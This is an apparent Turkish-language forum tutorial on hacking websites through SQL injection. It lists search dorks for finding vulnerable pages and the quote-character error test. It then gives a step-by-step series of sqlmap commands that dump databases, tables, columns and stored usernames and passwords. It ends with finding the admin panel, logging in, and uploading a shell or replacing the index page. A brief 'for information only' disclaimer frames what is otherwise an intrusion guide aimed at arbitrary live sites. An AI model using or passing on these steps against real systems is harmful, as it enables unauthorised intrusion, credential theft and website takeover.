SQL ACIKLI SITE NASIL BULNUR/NASIL SQL ACIGI TESPIT EDILIR/ NASIL HACKLENIR ?
not:Burada gosterdiklerim bilgi amacli. Lutfen kotuye kullanmayiniz. Ben sorumluluk ustlenmiyorum..
Merhaba . Bu gun sizlere sql injection gostercem .
ILK olarak yapmamiz gereken sey site bulma . Bunun icin 'dork' kullanicaz.
Bir kac tane dork veriyorum. Bunu siz kendinizde yapa bilirsiniz.
dork: inurl
age?id=
inurl:news?id=
ve.s 100 lerle dork bula bilirsiniz.
sonra buldugumuz siteye giryoruz .. Sitenin urlsi boyle olmali .,.
www.siteurlsi.com/page?id=1
buna benzer olmali yani ( istenilen yani( rakam,harf ve.s) id degeri olmali .Bazen id deyil , cat vs.s gibi seylerde yazilir.
Gelelim asil konulara burada sitede ilk once id degeri olan yerin sonuna - tek tirnak yani ( ' ) veya 2 tirnak ( " ) koyulur. Eger mysql,sql ve sayre gibi yazili hata aliyorsaniz burada sql acigi var. Acik oldugunu anladik nasil saldiri yapa biliriz. 3 yontem var sqlmap ile, havij ile, manuel olarak..
Bu videoda sqlmap ile olani anlaticam. HATIRLATMA : SQLMAP linux'ta kurulu olarak olur, amma bunu windows'ta da kullana biliriz. Sqlmap'i windows'ta kurmak icin youtubeda bir suru video var oradan baka bilirsizniz. Diyelim ki sqlmapi kurduk. Ve aciyoruz ilk komutumuz bu olucak.
NOT: EGER WINDOWS'TA KULLANIYOSANIZ ( SQLMAP.PY ) yazmalisiniz nedeni ise pythonla calistigi icin. Linuxda amma komutu yazarken (sqlmap) yazsaniz yeter.
Evet komutlarimiza gelelim.
1) sqlmap.py -u
www.siteurlsi.com/page?id=1 --dbs ( databesleri cekme emri verdik )
2) sqlmap.py -u
www.siteurlsi.com/page?id=1 -D databese adi --tables ( tablolari cekiyoruz )
3) sqlmap.py -u
www.siteurlsi.com/page?id=1 -D databese adi -T tablo adi --columns ( simdide kolumns cekme emri veriyoruz, )
4) sqlmap.py -u
www.siteurlsi.com/page?id=1 -D databese adi -T tablo adi -C columns ismi --dump ( simdi dump komutu ile bize gerekli olanlari yani(password.user ve.s gibileri) cektik)
evet bunlari bulduk simdide admin panelini bulup siteye giricez. Admin paneli soylede buluna bilir :
www.siteurlsi.com/admin ,
www.siteurlsi.com/login.php ve.s . Bunu programlarlada bula bilirsiniz mesela (DW admin panel finder) . Bulduktan sonra sifre ve username giriyoruz ve siteye shell ,index soka biliyoruz. Umarim yararli olmus..
